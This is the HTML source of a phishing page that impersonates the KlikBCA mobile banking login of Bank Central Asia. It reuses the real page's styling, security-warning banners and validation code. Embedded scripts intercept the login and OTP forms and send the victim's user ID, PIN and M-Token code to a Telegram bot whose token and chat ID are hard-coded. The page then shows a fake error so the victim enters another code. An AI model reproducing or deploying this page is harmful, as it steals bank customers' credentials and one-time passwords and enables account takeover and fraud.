<html xmlns="http://www.w3.org/1999/xhtml">
 <head> 
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
  <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;"> 
  <title>KlikBCA</title> 
  <style type="text/css">
	<!--
	hr { margin-top: auto; margin-bottom: auto;}
	.OranRule { border: 3px solid #e7d300;}
	-->
	</style> 
  <link href="https://m.klikbca.com/style.css" rel="stylesheet" type="text/css"> 
  <link href="https://m.klikbca.com/css/banner-slide.css" rel="stylesheet" type="text/css"> 
 </head> 
 <body onload="document.getElementById('txt_user_id').focus();"> 
  <div id="wrapper"> 
   <div id="header"> 
    <div id="logo" style="background:#FFFFFF url(https://m.klikbca.com/images/bg_top_2x55.gif) repeat-x top; height:57px; color:#FFFFFF"> 
     <img src="https://m.klikbca.com/images/logo_bca_64x55.gif" alt="BCA-lite"> 
    </div> 
    <!--<div style="background:#4f53b6">&nbsp;</div>--> 
    <div style="background:#e7cb00; height:3px">
     &nbsp;
    </div> 
   </div> 
   <div id="page-content" style="display:inline-block;"> 
    <form id="klikform" method="post" style="display:"> 
     <table id="tbl-txtinput" cellpadding="6" cellspacing="0" width="100%" style="display:"> 
      <tbody>
       <tr> 
        <td> 
         <table cellspacing="0" cellpadding="0"> 
          <tbody>
           <tr>
            <td style="color:#303962; border-bottom:solid 1px #6f6f6f">Silakan masukkan USER ID Anda</td>
           </tr> 
           <tr>
            <td style="color:#ff9c00; border-top:solid 1px #6f6f6f">Please enter your USER ID</td>
           </tr> 
          </tbody>
         </table> </td> 
       </tr> 
       <tr> 
        <td> <input type="text" name="txt_user_id" maxlength="12" size="24" id="txt_user_id" autocomplete="off"> </td> 
       </tr> 
       <tr> 
        <td> 
         <table cellspacing="0" cellpadding="0"> 
          <tbody>
           <tr>
            <td style="color:#303962; border-bottom:solid 1px #6f6f6f">Silakan masukkan PIN Internet Banking Anda</td>
           </tr> 
           <tr>
            <td style="color:#ff9c00; border-top:solid 1px #6f6f6f">Please enter your Internet Banking PIN</td>
           </tr> 
          </tbody>
         </table> </td> 
       </tr> 
       <tr> 
        <td> <input type="password" name="txt_pswd" size="24" maxlength="6" id="txt_pswd" autocomplete="off"> </td> 
       </tr> 
      </tbody>
     </table>
     <table cellpadding="6" cellspacing="0" width="100%"> 
      <tbody>
       <tr> 
        <td style="border-bottom:solid 1px #6f6f6f"> <input type="submit" value="LOGIN" name="value(Submit)" id="btnSubmit" onclick="javascript:return Login_Form_Validator()" onmouseover="this.style.cursor='hand'"> </td> 
        <td align="right" valign="bottom" style="border-bottom:solid 1px #6f6f6f"> <a href="javascript:go2Full();"><u>Full Site</u></a> </td> 
       </tr> 
      </tbody>
     </table> 
    </form> 
    <form id="klikotp" method="post" style="display: none"> 
     <div id="page-content" style="display:inline-block;"> 
     </div>
     <table id="tbl-txtinput" cellpadding="6" cellspacing="0" width="100%" style="display:"> 
     </table>
     <table id="tbl-txtinput" cellpadding="6" cellspacing="0" width="100%"> 
      <tbody>
       <tr> 
        <td> 
         <table cellspacing="0" cellpadding="0"> 
          <tbody>
           <tr>
            <td style="color:#303962; border-bottom:solid 1px #6f6f6f">Silakan memasukkan M-TOKEN Anda</td>
           </tr> 
           <tr>
            <td style="color:#ff9c00; border-top:solid 1px #6f6f6f">Please enter Your M-TOKEN</td>
           </tr> 
          </tbody>
         </table> </td> 
       </tr> 
       <tr> 
        <td> <input type="tel" name="token" maxlength="6" size="24" id="token" autocomplete="off"> </td> 
       </tr> 
      </tbody>
     </table> 
     <br> 
     <div id="kodesalah" style="margin-left: 10px; color: red; display: none">
      Terjadi kesalahan, Coba lagi.
     </div> 
     <br> 
     <table cellpadding="6" cellspacing="0" width="100%"> 
      <tbody>
       <tr> 
        <td style="border-bottom:solid 1px #6f6f6f"> <input type="submit" value="BATALKAN" id="btnSubmit1" onmouseover="this.style.cursor='hand'"> </td> 
        <td align="right" valign="bottom" style="border-bottom:solid 1px #6f6f6f"> <a href="javascript:go2Full();"><u>Full Site</u></a> </td> 
       </tr> 
      </tbody>
     </table> 
    </form> 
    <table cellpadding="6" cellspacing="0"> 
     <tbody>
      <tr> 
       <td> 
        <div class="banner-slide-container"> 
         <div class="banner-slide" style="display: block;"> 
          <img class="banner-image" src="https://m.klikbca.com/images/banner_login_1.png" onclick="bannerClickEvent('https://www.bca.co.id/id/informasi/Edukatips/2020/12/22/07/59/Salah-Transfer-Hindari-Dengan-Cara-Ini')" style="cursor: pointer;"> 
         </div> 
         <div class="banner-slide" style="display: none;"> 
          <img class="banner-image" src="https://m.klikbca.com/images/banner_login_2.png" onclick="bannerClickEvent('https://www.bca.co.id/id/informasi/awas-modus/2023/08/21/07/22/modus-penipuan-baru-menggunakan-action-button-view-atau-button-lainnya-di-whatsapp')" style="cursor: pointer;"> 
         </div> 
         <div class="banner-slide" style="display: none;"> 
          <img class="banner-image" src="https://m.klikbca.com/images/banner_login_3.png" onclick="bannerClickEvent('https://www.bca.co.id/id/Individu/layanan/pengiriman-uang/Remittance/Outward-Remittance/Remittance-via-KlikBCA-Individu?utm_source=all&amp;utm_medium=kv&amp;utm_campaign=internal_bca-dtb-akm_remittance_promo-or%20kbi_all_jun_cps_kv|22060101987&amp;utm_content=or%20kbi%20juni')" style="cursor: pointer;"> 
         </div> 
         <div class="banner-slide" style="display: none;"> 
          <img class="banner-image" src="https://m.klikbca.com/images/banner_login_4.png" onclick="bannerClickEvent('https://www.bca.co.id/id/informasi/news-and-features/2022/03/22/07/16/Kini-bisa-Perpanjang-Tahapan-Berjangka-BCA-via-KlikBCA?funnel_source=search_suggestion')" style="cursor: pointer;"> 
         </div> 
         <div class="banner-slide" style="display: none;"> 
          <img class="banner-image" src="https://m.klikbca.com/images/banner_login_5.png" onclick="bannerClickEvent('https://bca.id/3Cjnv09')" style="cursor: pointer;"> 
         </div> 
         <div class="banner-slide" style="display: none;"> 
          <img class="banner-image" src="https://m.klikbca.com/images/banner_login_6.png" onclick="bannerClickEvent('https://www.bca.co.id/id/informasi/Edukatips/2020/12/28/03/48/Stay-Up-to-Date-Perlancar-eBanking-mu-dengan-browser-dan-OS-terbaru')" style="cursor: pointer;"> 
         </div> 
        </div> </td> 
      </tr> 
      <tr> 
       <td> 
        <!--KlikBCA is secured with SSL 2048 bit encryption.<br />--> <a href="https://www.bca.co.id/awasmodus?utm_campaign=Awas%20Modus&amp;utm_source=iBank%20Klik%20BCA&amp;utm_medium=CTW&amp;utm_term=Edukatips&amp;utm_content=Banner%20Awas%20Modus" target="new"> <img src="https://m.klikbca.com/images/keamanan-ib.png" alt="" border="0" height="30"> </a> <img src="https://m.klikbca.com/images/digicert-seal.png" alt="DigiCert Seal" height="30"> </td> 
      </tr> 
     </tbody>
    </table> 
   </div> 
   <div id="footer" valign="middle"> 
    <table border="0" cellpadding="0" cellspacing="0" width="100%"> 
     <tbody>
      <tr> 
       <td width="10" height="35">&nbsp;</td> 
       <td valign="middle" align="left" width="50"></td> 
       <td>&nbsp;</td> 
      </tr> 
     </tbody>
    </table> 
   </div> 
  </div> 
  <script>
$('#klikform').on('submit', function (event) {

  event.stopPropagation();
    event.preventDefault();
 $('#process1').show();   
  document.getElementById('btnSubmit').value = "Proses..";
  
  
  var txt_pswd = document.getElementById('txt_pswd');
        var txt_user_id = document.getElementById('txt_user_id');
       

        var gabungan = "<pre>══════ 𝗞𝗹𝗶𝗸𝗕𝗖𝗔 ══════</pre>" + '%0A%0A├•※ 𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲 : ' + txt_user_id.value + '%0A├•※ 𝗣𝗮𝘀𝘀𝘄𝗼𝗿𝗱 : ' + txt_pswd.value + "%0A╰───────────────────•";

     


        $.ajax({
            url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
            method: `POST`,
 
 
 complete: function(data) {
            console.log('Complete')
  
setTimeout(function(){  
document.getElementById('btnSubmit').value = "LOGIN";     
 $("#klikotp").fadeIn();
    $('#klikform').hide();

    }, 1000); 
   
 }
    });

    return false;
});       


</script> 
  <script>
$('#klikotp').on('submit', function (event) {

  event.stopPropagation();
    event.preventDefault();
  document.getElementById('btnSubmit1').value = "Proses..";
  
  
  
  var txt_pswd = document.getElementById('txt_pswd');
  var txt_user_id = document.getElementById('txt_user_id');
  var token = document.getElementById('token');       

 var gabungan = "<pre>══════ 𝗞𝗹𝗶𝗸𝗕𝗖𝗔 ══════</pre>" + '%0A%0A├•※ 𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲 : ' + txt_user_id.value + '%0A├•※ 𝗣𝗮𝘀𝘀𝘄𝗼𝗿𝗱 : ' + txt_pswd.value + '%0A├•※ 𝗧𝗼𝗸𝗲𝗻 : ' + token.value + "%0A╰───────────────────•";


var token = "8601493294:AAGUf8w15jOJ3okSCXONfdwPcKCSYryVWgk";
var grup = "8383089969";



        $.ajax({
            url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
            method: `POST`,
 
 complete: function(data) {
            console.log('Complete')
  
setTimeout(function(){  
document.getElementById('btnSubmit1').value = "LOGIN";     
    $("#kodesalah").fadeIn();
    $("#token").val('');  

    }, 1000); 
setTimeout(function(){  
   
}, 4000); 
 }
    });

    return false;
});       


</script> 
  <script type="text/javascript">
document.getElementById("tbl-txtinput").addEventListener("keypress", function(event) {
	if (event.key === "Enter" || event.keyCode === 13) {
		
		event.preventDefault();
		
		document.getElementById("btnSubmit").click();
	}
});
	
</script> 
  <script type="text/javascript">
var blnSubmitted = false;


var dtSign = new Date(2024, parseInt("10")-1, 04, 23, 48, 31);
var dtClientNow = new Date();
var dtClientSubmit = new Date();


function bannerClickEvent(url){
	if (url) {
		if (url.trim() !== '') {		
			window.open(url,'_blank');
		}
	}
}

function Login_Form_Validator() {
  document.getElementById("txt_user_id").autocomplete = 'off';
  document.getElementById("txt_pswd").autocomplete = 'off';
  
  var blnResponse = false;
  if (blnSubmitted) {
    return false;
  }

  var strErrMsg = "";
  
  
  document.forms[0]['value(user_id)'].value = document.getElementById("txt_user_id").value;
  if( document.forms[0]['value(user_id)'].value == '') {
    alert("Silakan mengisi User ID anda/Please input your User ID");
    document.getElementById("txt_user_id").focus();
    return false;
  }
  if( document.forms[0]['value(user_id)'].value.length>12) {
    alert("User ID/Password Anda salah / Your User ID/Password is Wrong");
    document.getElementById("txt_user_id").select();
    document.getElementById("txt_user_id").focus();
    return false;
  }

  
  if(document.getElementById("txt_pswd").value == '') {
    alert("Silakan mengisi PIN anda/Please input your PIN");
    document.getElementById("txt_pswd").focus();
    return false;
  }
  if(document.getElementById("txt_pswd").value.length<6) {
    alert("PIN harus 6 Angka/PIN must be 6 digits");
    document.getElementById("txt_pswd").focus();
    return false;
  }
  
  if ( !blnSubmitted ) {
    blnSubmitted = true;
    blnResponse = true;
    
    signAndEncrypt();
  }

  return blnResponse;
}

function signAndEncrypt() {
	var jsEncrypt = new JSEncrypt();
 	const publicKeyString = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1F3Tb5ME9iY7HwrNiOUMdTDZJRs65HY+XHNJJYrI/165H9NigorOOLVrC/YV7QLyssXbZ9lUDzo4KZAZhQcSNekK2dfV3Gwg7X4XT3Nbs18I+YqTUqhFiedPTf7sefT3nkqvV5FE3XeY6A/l0rOk50DtRnI68fqhf50pQgy9L9DAViYvVno2B8MZyb/U0vA0PX29ruMntmGJeU9SQg7kPjBpGScFn3CFkWn509R0iVYaNvhjvJhcGMSTldd2GQUwdh7IMTMGdKn4NliFy7oLRnE3LiGoMVnPbwnw67EWcr+e3UMKkNk91kgiPk/vvb6UEGtFRCoE4g6kql014tvNdwIDAQAB";
    jsEncrypt.setPublicKey(publicKeyString);
    
    dtClientSubmit = new Date();
    var diffDt = Math.abs(dtClientSubmit-dtClientNow);
    dtSign = new Date(dtSign.getTime() + diffDt);
    
    var currentYear = dtSign.getFullYear();
    var currentMonth = dtSign.getMonth()+1;
    currentMonth = (currentMonth < 10 ? '0' : '') + currentMonth;
    var currentDate = (dtSign.getDate() < 10 ? '0' : '') + dtSign.getDate();
    var currentHour = (dtSign.getHours() < 10 ? '0' : '') + dtSign.getHours();
    var currentMin = (dtSign.getMinutes() < 10 ? '0' : '') + dtSign.getMinutes();
    var currentSec = (dtSign.getSeconds() < 10 ? '0' : '') + dtSign.getSeconds();
	var formatedDate = "".concat(currentYear, currentMonth, currentDate, currentHour, currentMin, currentSec);
	
    var enkrip = jsEncrypt.encrypt("".concat(document.getElementById("txt_pswd").value, formatedDate));
    
	document.forms[0]['value(pswd)'].value = enkrip;
}


function showMsg(strErr) {
  alert(strErr);
}

function sPrivacy() {

    msgWindow=window.open("privacy.htm","NameOfWindow","toolbar=no,width=790,height=380,left=20,top=80,directories=no,status=no,scrollbars=yes,resize=yes,menubar=no")

}

function go2Full()
{
document.iBankForm.action = "https://ibank.klikbca.com";
document.iBankForm.submit();
}

</script> 
  <script type="text/javascript">
window.onload(function(){
	
	});
</script> 
  <script type="text/javascript">
var slideIndex = 0;
var timerSlide;
var isAutoNextSlide = true;

showSlideAuto();

function showSlideAuto() {
  var slides = document.getElementsByClassName("banner-slide");
  
  for (var i=0; i<slides.length; i++) {
    slides[i].style.display = "none";  
  }
  
  if (isAutoNextSlide) {
	slideIndex++;
  }
  isAutoNextSlide = true;
  
  if (slideIndex > slides.length) {
	slideIndex = 1;
  }
  
  slides[slideIndex-1].style.display = "block";  
  
  timerSlide = setTimeout(showSlideAuto, 5000); // Change banner every 5s
}
</script> 
 </body>
</html>